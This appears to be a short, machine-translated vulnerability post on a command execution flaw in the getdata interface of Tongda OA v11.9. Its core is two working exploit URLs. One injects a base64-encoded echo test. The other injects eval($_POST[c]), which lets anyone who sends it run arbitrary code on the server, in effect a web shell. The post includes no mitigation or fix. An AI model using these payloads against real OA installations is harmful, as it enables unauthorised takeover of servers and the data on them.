Tongda Oa V11 9 Getdata Arbitrary Command Execution Vulnerability
Tongda Oa V11 9 Getdata Arbitrary Command Execution Vulnerability
Tongda OA v11.9 getdata arbitrary command execution vulnerability
Vulnerability Description
There is a vulnerability to execute any command in the OA v11.9 getdata interface. The attacker can execute any command in the server to control the server’s permissions through the vulnerability.
Vulnerability Impact
Tongda OA v11.9
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB2dWxuX3Rlc3Q7%22)))%3B/*&id=19&module=Carouselimage
/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
This post is licensed under CC BY 4.0 by the author.